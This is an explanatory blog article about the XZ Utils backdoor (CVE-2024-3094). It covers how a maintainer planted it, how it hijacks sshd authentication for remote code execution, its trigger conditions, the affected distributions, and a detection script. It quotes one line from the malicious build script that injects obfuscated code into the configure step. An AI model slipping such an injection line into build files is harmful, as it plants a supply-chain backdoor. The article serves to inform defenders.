Hello everyone, in today's article we are going to discuss a case that has been discussed a lot in recent days and it is the vulnerability CVE-2024-3094 or as it is commonly called “backdoor in XZ”.
XZ Utils is an open source data compression tool present in almost all Linux distributions, which is used to compress large file formats into smaller, more manageable sizes for sharing. Being open source software, it is liberally maintained and updated by developers.
These updates are added to the project through what are called “Pull Requests” and before being admitted, they are reviewed by other team members who have previously contributed to it in order to avoid errors in the proposed source code.
In this case, a Github user who contributed to the XZ project, named Jia Tan, managed to obtain permissions to review and accept code modifications, gaining the trust of the rest of the team and being able to accept his own contributions without them being reviewed by other members. .
With this trust placed in his work by team members, Jia incorporated malicious code into the xz-utils project, with the intention of interfering with the authentication of the SSH service and allowing remote code execution or RCE.
Vulnerability explanation
It all started when Andrés Freund, a software engineer at Microsoft, detected unusual behavior with the sshd service, which was consuming a high amount of CPU.
Within the XZ build process, the “Build-to-Host.m4” script is executed. This script contains the following line of code:
gl_[$1]config='sed "r\n" $gl_am_configmake | eval $gl_path_map | $gl[$1]_prefix -d 2>/dev/null'
Which injects an obfuscated script at the end of the configuration script. This configuration script is responsible for creating the MakeFiles for xz-utils and liblzma.
The main objective of the script is to modify the liblzma MakeFile at runtime, making the RSA_public_decrypt@....pl point to the malicious code of the backdoor.
During the sshd authentication process, the RSA_public_decrypt@....pl function is invoked causing the malicious code of the attacker it is targeting to be executed. This code is responsible for extracting the payload of the public key that is passed during the authentication process and which will be subjected to a series of verification steps and signature controls. If it successfully passes these checks, it is transferred to the libc system() function, which will be responsible for executing the payload and carrying out remote code execution (RCE).
The obfuscated code that runs within the configuration script raises a backdoor only under certain conditions:
1. The target operating system must be Linux x86-64.
2. The XZ build process must be part of building a Debian or RPM package.
3. The binary that is invoked must be in the path /usr/sbin/sshd
4. The TERM environment variable should not be set
5. Neither should the LD_DEBUG and LD_PROFILE variables be
6. The LANG environment variable must be set by default by sshd.
Affected distributions
- Fedora 41 and Fedora Rawhide
- Kali Linux updated between March 26 and 29
- Alpine 5.6.0, 5.6.0-r0, 5.6.0-r1, 5.6.1, 5.6.1-r0 y 5.6.1-r1
- Arch that have xz-utils versions 5.6.0 and 5.6.1 installed
Additionally, to determine if a vulnerable version of xz-utils software has been installed, you can use the script created by the JFrog team, which can be found at the following link.
This checker is quite simple, it performs the six checks, which are part of the necessary conditions that we have mentioned previously, to be able to exploit this vulnerability. We show you an example of use:
Thank you very much and until the next installment!